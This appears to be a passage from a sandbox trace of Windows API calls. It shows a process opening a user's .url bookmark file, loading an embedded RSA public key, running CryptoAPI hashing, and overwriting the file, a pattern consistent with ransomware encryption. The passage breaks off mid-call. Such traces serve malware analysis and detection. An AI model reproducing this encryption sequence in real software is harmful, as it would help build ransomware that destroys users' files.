[0205.286] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0205.286] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0205.286] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0205.286] PathFindFileNameW (pszPath="") returned="" [0205.286] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\*", lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe5472dd, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x32ef1f8 [0205.287] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe5472dd, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0205.287] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d86cf60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="IE Add-on site.url", cAlternateFileName="IEADD-~1.URL")) returned 1 [0205.287] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\IE Add-on site.url") returned=".url" [0205.287] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\IE Add-on site.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\ie add-on site.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x63c [0205.287] GetFileSizeEx (in: hFile=0x63c, lpFileSize=0x39cfb40 | out: lpFileSize=0x39cfb40*=133) returned 1 [0205.287] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3d10000 [0205.289] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0x5f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0205.290] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39cfb78, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb78*=0x26, lpOverlapped=0x0) returned 1 [0205.290] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c01e0 [0205.290] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39cfb70, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb70*=0x85, lpOverlapped=0x0) returned 1 [0205.290] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0205.290] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1da) returned 0x3310808 [0205.291] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0205.291] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0205.291] CryptAcquireContextW (in: phProv=0x39cfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39cfa50*=0x321c00) returned 1 [0205.291] CryptCreateHash (in: hProv=0x321c00, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39cfa58 | out: phHash=0x39cfa58) returned 1 [0205.291] CryptHashData (hHash=0x32ef238, pbData=0x3310808, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0205.291] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x0, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39cfa54) returned 1 [0205.291] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x11) returned 0x32b3720 [0205.291] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x32b3720, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x32b3720, pdwDataLen=0x39cfa54) returned 1 [0205.292] GetLastError () returned 0x0 [0205.292] CryptDestroyHash (hHash=0x32ef238) returned 1 [0205.292] CryptReleaseContext (hProv=0x321c00, dwFlags=0x0) returned 1 [0205.292] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3310808 | out: hHeap=0x2c0000) returned 1 [0205.292] UuidCreate (in: Uuid=0x39cfa48 | out: Uuid=0x39cfa48) returned 0x0 [0205.292] UuidToStringA (in: Uuid=0x39cfa48, StringUuid=0x39cfa40 | out: StringUuid=0x39cfa40) returned 0x0 [0205.292] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c0170 [0205.292] RpcStringFreeA (in: String=0x39cfa40 | out: String=0x39cfa40) returned 0x0 [0205.292] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c01e0 | out: hHeap=0x2c0000) returned 1 [0205.292] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c01e0 [0205.292] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2eee30 [0205.292] SetFilePointer (in: hFile=0x63c, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0205.292] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0170 | out: hHeap=0x2c0000) returned 1 [0205.292] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1e0) returned 0x3310808 [0205.292] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c0170 [0205.292] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1e0) returned 0x32eb20 [0205.292] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x32e51f8 [0205.292] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x3b81500 [0205.292] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe700 [0205.292] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x3b81548 [0205.292] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe718 [0205.292] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe748 [0205.292] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe790 [0205.292] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe760 [0205.292] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x24) returned 0x32f7e58 [0205.292] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x158) returned 0x3b72b80 [0205.292] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x3b72b80, Size=0x218) returned 0x3b7c6a8 [0205.292] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x3b74e80 [0205.292] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe748 | out: hHeap=0x2c0000) returned 1 [0205.293] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe760 | out: hHeap=0x2c0000) returned 1 [0205.293] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe790 | out: hHeap=0x2c0000) returned 1 [0205.293] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f7e58 | out: hHeap=0x2c0000) returned 1 [0205.293] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b74e80 | out: hHeap=0x2c0000) returned 1 [0205.293] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe790 [0205.293] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x3277198 [0205.293] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x32fe760 [0205.293] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x32b36c0 [0205.293] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x9) returned 0x32fe748 [0205.293] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x3277188 [0205.293] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10e) returned 0x3b6edb0 [0205.293] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9250 [0205.293] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x32e5258 [0205.293] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b3720 [0205.293] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x104) returned 0x3b6eec8 [0205.293] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b36e0 [0205.293] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771a8 [0205.293] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6edb0 | out: hHeap=0x2c0000) returned 1 [0205.293] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe760 | out: hHeap=0x2c0000) returned 1 [0205.293] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277188 | out: hHeap=0x2c0000) returned 1 [0205.293] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe748 | out: hHeap=0x2c0000) returned 1 [0205.293] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b36c0 | out: hHeap=0x2c0000) returned 1 [0205.293] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277198 | out: hHeap=0x2c0000) returned 1 [0205.293] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe790 | out: hHeap=0x2c0000) returned 1 [0205.293] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9250 | out: hHeap=0x2c0000) returned 1 [0205.293] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32e51f8 | out: hHeap=0x2c0000) returned 1 [0205.293] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7c6a8 | out: hHeap=0x2c0000) returned 1 [0205.293] GetCurrentThreadId () returned 0x600 [0205.293] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b75968 [0205.294] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x82) returned 0x3b68b28 [0205.294] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2c) returned 0x32c0218 [0205.294] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321c00 [0205.294] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x148) returned 0x336fe98 [0205.294] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3277198 [0205.294] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3277188 [0205.294] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b75d88 [0205.294] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0205.294] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0205.294] GetCurrentThreadId () returned 0x600 [0205.294] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0205.294] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0205.294] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xeb) returned 0x32b69d8 [0205.294] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0205.294] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0205.294] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0205.294] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0205.294] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b69d8 | out: hHeap=0x2c0000) returned 1 [0205.294] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b75c80 [0205.294] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277198 | out: hHeap=0x2c0000) returned 1 [0205.294] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4c) returned 0x32c38e8 [0205.294] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3277198 [0205.294] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b75b78 [0205.294] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771c8 [0205.294] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe790 [0205.294] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0205.294] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771c8 [0205.294] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x31b9e0 [0205.294] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x31b9f0 [0205.295] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b780 [0205.295] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b790 [0205.295] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7a0 [0205.295] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7b0 [0205.295] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe748 [0205.295] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9e0 | out: hHeap=0x2c0000) returned 1 [0205.295] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x31b9e0 [0205.295] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0205.295] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771c8 [0205.295] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7c0 [0205.295] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7d0 [0205.295] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7e0 [0205.295] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe760 [0205.295] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7d0 | out: hHeap=0x2c0000) returned 1 [0205.295] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b36c0 [0205.295] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7c0 | out: hHeap=0x2c0000) returned 1 [0205.295] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe730 [0205.295] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7e0 | out: hHeap=0x2c0000) returned 1 [0205.295] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe7a8 [0205.295] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0205.295] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x32771c8 [0205.295] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7a0 | out: hHeap=0x2c0000) returned 1 [0205.295] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe778 [0205.295] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0205.295] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe7c0 [0205.295] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9f0 | out: hHeap=0x2c0000) returned 1 [0205.295] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x31b9f0 [0205.295] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277198 | out: hHeap=0x2c0000) returned 1 [0205.295] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b36a0 [0205.296] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9f0 | out: hHeap=0x2c0000) returned 1 [0205.296] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x32b37c0 [0205.296] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe748 | out: hHeap=0x2c0000) returned 1 [0205.296] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe748 [0205.296] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9e0 | out: hHeap=0x2c0000) returned 1 [0205.296] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x204) returned 0x3b7c6a8 [0205.296] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe790 | out: hHeap=0x2c0000) returned 1 [0205.296] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x3b6edb0 [0205.296] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe7c0 | out: hHeap=0x2c0000) returned 1 [0205.296] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x210) returned 0x336f8f0 [0205.296] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b37c0 | out: hHeap=0x2c0000) returned 1 [0205.296] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10c) returned 0x3b6eb80 [0205.296] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b780 | out: hHeap=0x2c0000) returned 1 [0205.296] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x3b6ec98 [0205.296] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe748 | out: hHeap=0x2c0000) returned 1 [0205.296] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x200) returned 0x3b74e80 [0205.296] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6edb0 | out: hHeap=0x2c0000) returned 1 [0205.296] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b75a70 [0205.296] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277188 | out: hHeap=0x2c0000) returned 1 [0205.296] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321c00 | out: hHeap=0x2c0000) returned 1 [0205.296] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b75c80 | out: hHeap=0x2c0000) returned 1 [0205.296] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b75a70 | out: hHeap=0x2c0000) returned 1 [0205.296] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b36a0 | out: hHeap=0x2c0000) returned 1 [0205.296] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6ec98 | out: hHeap=0x2c0000) returned 1 [0205.297] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x336f8f0 | out: hHeap=0x2c0000) returned 1 [0205.297] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b74e80 | out: hHeap=0x2c0000) returned 1 [0205.297] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6eb80 | out: hHeap=0x2c0000) returned 1 [0205.297] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b790 | out: hHeap=0x2c0000) returned 1 [0205.297] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe778 | out: hHeap=0x2c0000) returned 1 [0205.297] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7b0 | out: hHeap=0x2c0000) returned 1 [0205.297] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe7a8 | out: hHeap=0x2c0000) returned 1 [0205.297] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b36c0 | out: hHeap=0x2c0000) returned 1 [0205.297] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe760 | out: hHeap=0x2c0000) returned 1 [0205.297] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe730 | out: hHeap=0x2c0000) returned 1 [0205.297] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x336fe98 | out: hHeap=0x2c0000) returned 1 [0205.297] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0218 | out: hHeap=0x2c0000) returned 1 [0205.297] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b75d88 | out: hHeap=0x2c0000) returned 1 [0205.297] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe718 | out: hHeap=0x2c0000) returned 1 [0205.297] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b81548 | out: hHeap=0x2c0000) returned 1 [0205.297] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7c6a8 | out: hHeap=0x2c0000) returned 1 [0205.297] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b75b78 | out: hHeap=0x2c0000) returned 1 [0205.297] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c38e8 | out: hHeap=0x2c0000) returned 1 [0205.297] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6eec8 | out: hHeap=0x2c0000) returned 1 [0205.297] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b3720 | out: hHeap=0x2c0000) returned 1 [0205.297] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771a8 | out: hHeap=0x2c0000) returned 1 [0205.297] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b36e0 | out: hHeap=0x2c0000) returned 1 [0205.297] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32e5258 | out: hHeap=0x2c0000) returned 1 [0205.297] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32eb20 | out: hHeap=0x2c0000) returned 1 [0205.297] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0170 | out: hHeap=0x2c0000) returned 1 [0205.297] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3310808 | out: hHeap=0x2c0000) returned 1 [0205.297] WriteFile (in: hFile=0x63c, lpBuffer=0x2eee30*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x39cfb14, lpOverlapped=0x0 | out: lpBuffer=0x2eee30*, lpNumberOfBytesWritten=0x39cfb14*=0x80, lpOverlapped=0x0) returned 1 [0205.298] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eee30 | out: hHeap=0x2c0000) returned 1 [0205.298] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0x85, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0205.298] WriteFile (in: hFile=0x63c, lpBuffer=0x3b75968*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x3b75968*, lpNumberOfBytesWritten=0x39cfb50*=0x100, lpOverlapped=0x0) returned 1 [0205.298] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b75968 | out: hHeap=0x2c0000) returned 1 [0205.298] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x3846b8 [0205.298] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x428) returned 0x3b74e80 [0205.298] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="8TaHEsq5r7cNJKbYdWseLEB2pW1FuZKoKjKg5tt1", cchWideChar=-1, 